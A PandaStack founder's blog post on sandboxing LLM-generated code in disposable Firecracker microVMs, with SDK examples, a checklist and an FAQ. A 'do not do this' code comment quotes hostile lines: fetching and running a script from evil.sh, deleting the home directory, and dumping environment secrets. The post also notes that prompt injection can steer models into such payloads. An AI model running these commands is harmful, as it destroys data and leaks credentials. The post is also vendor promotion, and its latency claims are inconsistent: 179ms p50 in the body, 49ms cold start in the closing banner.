How to Jail LLM-Generated Code

Ajay Kumar·June 27, 2026·9 min read

If you let a language model write code and then run that code, you have signed up to execute software authored by a system that cannot be held accountable, did not read its own output for safety, and was possibly steered by text it read on the internet thirty seconds ago. This is not a knock on the models — they are extraordinary. It's a statement about probability. Run enough model-generated code and the distribution will eventually hand you `rm -rf /`, an infinite loop, a fork bomb, an outbound request to an address you've never heard of, or a payload that a prompt injection talked the model into emitting. The model is not malicious. It's just confidently wrong at root, on a long enough timeline. So the correct posture is not "trust but verify" — it's to treat every byte of model output as hostile and run it somewhere you can afford to lose. This post is the how-to: the defense layers, why each one exists, and the exact code to jail LLM-generated code in production.

The mental model that makes the rest of this easy: you are not trying to make the code safe. You cannot — you didn't write it and can't review it in time. You are trying to make it not matter that the code is dangerous. Every layer below moves blast radius away from things you care about and toward a throwaway box you were going to delete anyway.

Why you treat all model output as hostile

"Hostile" here is not an accusation, it's a threat-model default. You assume the worst because three properties of LLM code generation make the worst genuinely likely over time, and none of them are fixable by being a better prompter.

No accountable author — there is no human who understood the command, intended its effects, and can be asked why. A code review assumes an author who can defend the diff. Model output has no such author; the "author" is a sampling process.
Adversarial inputs (prompt injection) — the model often acts on text it just read: a web page, a file, a tool result, an email. Any of that can carry instructions, so a command the model emits may have been authored by an attacker who poisoned the input, not by the model's own reasoning.
Confidently wrong — the most common failure is not evil, it's a hallucinated path, a destructive flag the model thought was harmless, or a 2014 Stack Overflow `curl | sh` it pattern-matched to. It will state, with total fluency, that wiping the directory is the fix. Fluency is not correctness.

The unattended loop multiplies all three. An agent runs the next command based on the last one's output with no human in the loop to flinch at `rm -rf /`. By the time a person looks, the command has run. So you design for the run that goes wrong, because at scale it will, and you make that run boring.

Layer 0: do not eval() in your own process

The fastest way to get owned is to feed model output to `eval()`, `exec()`, or `subprocess` in the same process that holds your secrets, your database connection, and your network. The code inherits everything your process can do — your API keys are in its environment, your DB is one connection string away, and your cloud metadata endpoint is a single HTTP request away. There is no boundary here at all. This is the one pattern with zero acceptable uses for untrusted input.

# ============================================================
# DO NOT DO THIS. This is the vulnerability, not the example.
# ============================================================
import subprocess

# Whatever the model decided to run this turn.
model_output = get_code_from_llm(user_request)

# eval / exec in your own interpreter: the code now has your
# process's memory, your imported secrets, your everything.
eval(model_output)                      # <- owns your process

# subprocess on the host is no better: same env vars, same
# filesystem, same network, same cloud credentials.
subprocess.run(model_output, shell=True)  # <- owns your host

# The model only has to emit one of these once:
#   import os; os.system('curl evil.sh | sh')
#   rm -rf ~
#   print(open('/proc/self/environ').read())   # your secrets
# ...and there is no boundary to stop it. There never was one.

If you remember one thing: model output and your process must never share an address space, an environment, or a credential set. "I sanitize the string first" does not save you — you cannot reliably parse what arbitrary code will do without running it, and once you've run it, it's too late.

Layer 0.5: a bare container is not the jail either

The next instinct is a Docker container, and it's a real improvement over running on the host — but a plain container is not sufficient as the sole boundary for arbitrary model-generated code. Every container on a host shares one Linux kernel, and the namespaces, cgroups, capabilities, and seccomp filters that isolate it are all features of that same shared kernel. So the kernel is simultaneously running the untrusted code and being protected from it. A kernel bug reachable via a syscall, a container-runtime bug, or — most common in practice — a misconfiguration (a `--privileged` flag, a mounted `docker.sock`, a host bind mount) reaches the host and, on a multi-tenant box, every neighbor. Containers are the right tool for your own trusted code. They are not a hardware boundary against code you'd describe as hostile. The fuller argument lives in /blog/why-docker-is-not-a-sandbox.

The jail: a fresh microVM per task, then six bars on the window

The boundary that actually holds is a microVM: each task gets its own guest kernel inside CPU hardware virtualization (KVM), so an escape has to break the much smaller hypervisor boundary instead of one reachable syscall in a shared kernel. Firecracker — the VMM AWS built for Lambda and Fargate — is the sharpest version, with a minimal device model and a millisecond boot. But the microVM is only the cell. A jail is the cell plus the rules. Six bars, in order of how often they actually save you:

Hardware kernel isolation — run the code in a microVM with its own guest kernel, not a shared-kernel container. This is the wall: it contains an escape, the thing every other layer assumes is holding.
A TTL / wall-clock kill — set a time-to-live on the sandbox so an infinite loop, a hung download, or an injected `sleep infinity` gets reaped automatically even if your code forgets. Loops loop; sometimes they don't stop.
CPU and memory caps — bound the VM so a fork bomb or a crypto-miner the model was tricked into running starves itself inside its own cell instead of the host fleet. The baked VM size is the ceiling the guest cannot exceed.
Controlled network egress — default-deny outbound, allowlist only what the task needs. This is what stops `curl | sh` from fetching a payload and stops a quiet POST of whatever the code found from ever leaving.
No persistent secrets in the guest — never inject cloud keys, DB passwords, or long-lived tokens. Pass only a narrowly-scoped, short-lived credential if the task truly needs one. You cannot exfiltrate a secret that was never in the room.
Destroy-after — the sandbox is not scrubbed or reset between tasks, it is destroyed, and the next task gets a clean one restored from a known-good snapshot. A poisoned run cannot plant something for the next run because there is no next run in that VM.

Bars 1 and 6 — hardware isolation plus destroy-after — are the load-bearing pair. Isolation answers "can this reach the host?"; ephemerality answers "can this run affect the next one?" Bars 2 through 5 decide how bad a single contained run can be before it's torn down. You want all six; the comparison below is why the cell has to be a microVM and not the cheaper options.

eval-in-process vs container vs microVM

eval() / subprocess in your process — no boundary at all. The code gets your memory, your secrets, your network, your credentials. Acceptable only for code you wrote and fully trust; never for model output.
Bare container (Docker, runc) — a real isolation mechanism but a shared-kernel boundary: the whole host syscall ABI is the attack surface, and a kernel bug, runtime bug, or misconfig reaches the host and every neighbor. Right for your own trusted code; not sufficient alone for arbitrary, hostile, multi-tenant model output.
microVM (Firecracker) — each task gets its own guest kernel inside hardware virtualization, so the host is exposed only to a small, audited surface (the VMM, the KVM ioctl interface, a minimal virtio device model). An escape must break the hypervisor, not one syscall. This is the right default for jailing LLM-generated code — and with snapshot-restore it's cheap enough to do per task.

Stronger is not absolute, and a security reader should hold us to that. KVM has had real guest-to-host escape CVEs (Google pays up to $250,000 for one via kvmCTF), and microarchitectural side channels cross the VM boundary in principle. The honest claim is that a microVM is a meaningfully smaller, hardware-enforced, more-audited boundary than a shared kernel — not an unbreakable one. You still want every other bar on the window.

The good example: jailing it with PandaStack

Here is the same task as the BAD example above, done correctly. The model's code runs inside a fresh, hardware-isolated microVM with a TTL, the VM holds nothing worth stealing, and it is destroyed the moment the task ends. We never inspect the code for safety — we don't have to, because of where it runs. The historical objection to a VM-per-task pattern was boot cost; PandaStack removes it by restoring a baked Firecracker snapshot on demand, with a p50 of about 179ms (p99 ~203ms) to a live, isolated microVM and no warm pool of idle VMs. The first spawn of a brand-new template cold-boots in roughly 3 seconds and then bakes a snapshot, so every create after that takes the fast path. At ~179ms a clean jail per task is the default, not a luxury.

from pandastack import Sandbox

# Whatever the model wrote this turn. Assume it's hostile: it may be
# the product of a prompt injection in the file we asked it to summarize.
model_code = get_code_from_llm(user_request)

# One hardware-isolated microVM, just for this task (~179ms p50 to create).
# ttl_seconds is the wall-clock kill: even an infinite loop or a hung
# download gets reaped automatically if we never tear it down ourselves.
with Sandbox.create(
    template="code-interpreter",
    ttl_seconds=60,            # bar #2: TTL / wall-clock kill
) as sbx:
    # Write the model's code into the guest filesystem, not into our process.
    sbx.filesystem.write("/work/task.py", model_code)

    # Run it with a per-command timeout so a tight loop hits a wall,
    # not our bill. CPU/mem caps (bar #3) come from the baked VM size;
    # egress is default-deny + allowlist (bar #4); no host secrets are
    # in this guest (bar #5).
    result = sbx.exec(
        "python3 /work/task.py",
        timeout_seconds=30,
    )
    print("exit:", result.exit_code)   # 0 == success; your primary signal
    print(result.stdout)
    print(result.stderr[:500])
# bar #1 held the whole time; bar #6 fires HERE: the context manager
# destroys the VM. The model can rm -rf /, fork-bomb, or curl | sh inside
# it — the worst case is a deleted throwaway box. Nothing survives to the
# next task: no files, no processes, no cached secret.

The SDK reads `PANDASTACK_API_KEY` (keys are prefixed `pds_`) from the environment, with a configurable base URL; the same flow exists in the TypeScript SDK (`@pandastack/sdk`) and the `pandastack` CLI. PandaStack's core is Apache-2.0 and self-hostable on your own Linux KVM hosts (`/dev/kvm`): you run the control-plane API and a per-host agent, and the sandboxes execute on your infrastructure. If you need working state to carry across steps within one task — packages installed, a repo cloned — fork the configured sandbox rather than reusing one across trust boundaries; a same-host fork lands in roughly 400–750ms via copy-on-write (guest memory MAP_PRIVATE, rootfs reflink), a cross-host fork in 1.2–3.5s. See /blog/snapshot-and-fork-explained.

The jailing checklist

Run this list before you ship anything that executes model output. If you can't tick all of it, you're relying on the model never being wrong, which is the one thing it cannot promise you.

Model output never touches eval(), exec(), or subprocess in a process that holds secrets, a DB connection, or your network. Ever.
The code runs in a hardware-isolated microVM (its own guest kernel via KVM), not a bare shared-kernel container, and not on the host.
Every sandbox has a TTL so a runaway loop or hung command is reaped automatically without human intervention.
CPU and memory are capped so a fork bomb or miner starves its own VM, not the fleet, and each exec has a per-command timeout.
Network egress is default-deny with an allowlist for only what the task needs; the cloud metadata endpoint (169.254.169.254) is unreachable from inside.
No host credentials, cloud keys, or long-lived tokens are injected into the guest — only a narrowly-scoped, short-lived credential if the task genuinely requires one.
Results (exit code, stdout, stderr) are captured over the platform API, not by mounting host paths back into the guest.
The sandbox is destroyed after the task — one environment per task, always thrown away, never reused across tasks or tenants.

The payoff: a deleted VM instead of an incident

Put all six bars on the window and the worst day for a system that runs LLM-generated code stops being an incident review and a credential rotation. It becomes a confused log line — `exit: 1, stderr: rm: cannot remove '/': Permission denied` — and a sandbox that was already scheduled for deletion. The model will keep getting better, and it will keep, occasionally, being confidently wrong at root. Your job is not to outguess it. Your job is to make sure the one time it runs something terrible, the only casualty is a throwaway VM. For the agent-loop version of this pattern — the shell-command case, allowlists, and prompt injection — see /blog/sandbox-ai-agent-shell-commands; for the threat-model-first decision framework across every isolation option, see /blog/how-to-sandbox-untrusted-code.

Frequently asked questions

How do I safely run code that an LLM generated?

Never feed it to eval(), exec(), or subprocess in your own process — that gives the code your secrets, network, and credentials. Instead run it inside a fresh hardware-isolated microVM created just for that task, with a TTL (wall-clock kill), CPU and memory caps, default-deny network egress, no host credentials in the guest, and destruction of the VM when the task ends. You don't inspect the code for safety; you make the environment expendable so a bad command can only wreck a throwaway box. Sub-second microVM creation (PandaStack's is ~179ms p50) makes a disposable VM per task practical rather than a luxury.

Why should I treat all LLM output as hostile when the model isn't malicious?

Because the threat doesn't require malice. The model has no accountable author who understood the command, it often acts on inputs that may be attacker-controlled (prompt injection from a web page, file, or tool result), and its most common failure is being confidently wrong — a hallucinated path or a destructive flag it believed was harmless. Run enough model code unattended and the distribution will eventually produce rm -rf /, an infinite loop, a fork bomb, or an exfil request. "Treat all output as hostile" is just designing for the run that goes wrong, because at scale it will.

Isn't a Docker container enough to jail LLM-generated code?

Not on its own for arbitrary, possibly-hostile, multi-tenant model output. Every container shares the host's Linux kernel, and the namespaces, cgroups, capabilities, and seccomp filters that isolate it are enforced by that same kernel — so a kernel bug reachable via a syscall, a runtime bug, or a misconfiguration (privileged container, mounted docker.sock, host mounts) can reach the host and every neighbor. Containers are the right tool for your own trusted code. For code you'd call hostile, use a microVM with its own guest kernel, which contains an escape at the hardware-virtualization boundary instead of the shared syscall surface.

How do I stop LLM-generated code from making outbound network requests or stealing secrets?

Two layers. First, default-deny network egress with an allowlist for only what the task needs, so the code can't curl a payload in or POST data out, and make the cloud metadata endpoint (169.254.169.254) unreachable from inside the sandbox. Second, put no secrets worth stealing in the guest — never inject cloud keys, database passwords, or long-lived tokens; pass only a narrowly-scoped, short-lived credential if the task truly requires one. You cannot exfiltrate a secret that was never in the room, and you cannot reach a host you were never allowed to talk to.

Doesn't creating a fresh microVM for every task add too much latency?

Not anymore. PandaStack restores a baked Firecracker snapshot on demand with a p50 of about 179ms (p99 ~203ms) to a live, isolated microVM, and there's no warm pool of idle VMs. The first spawn of a brand-new template cold-boots in roughly 3 seconds and bakes a snapshot, so every create after that takes the fast path. If you need each task to start from a known-good post-setup state, fork a configured sandbox instead — a same-host fork lands in roughly 400–750ms via copy-on-write. At that cost, a disposable jail per task is a sensible default rather than an expensive optimization.

Run code in a microVM in one API call.

49ms p50 cold start. Fork, snapshot, and scale to zero.

Start free

Written by Ajay Kumar, Founder, PandaStack.